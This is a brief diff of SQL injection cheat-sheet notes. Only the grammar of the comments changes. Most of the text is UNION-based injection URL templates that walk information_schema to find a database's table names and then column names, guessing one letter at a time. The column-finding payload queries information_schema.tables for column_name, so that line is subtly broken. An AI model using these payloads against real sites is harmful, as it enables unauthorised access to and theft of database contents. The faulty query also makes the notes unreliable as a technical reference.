SQL Injection

 $found is the union value that has been caught in the previous step

-• Find Table name by iteration
+• Find the table name by iteration

 $url/query?$column=$changedvalue' UNION $found FROM information_schema.tables WHERE table_schema = '$dbfound' and table_name LIKE 'a%';

-#Repeat until found all table names
+#Repeat until all table names are found

-• Find column by iteration
+• Find the column by iteration

 $url/query?$column=$changedvalue' UNION $found FROM information_schema.tables WHERE table_schema = '$dbfound' and table_name = 'table' and column_name LIKE 'a%';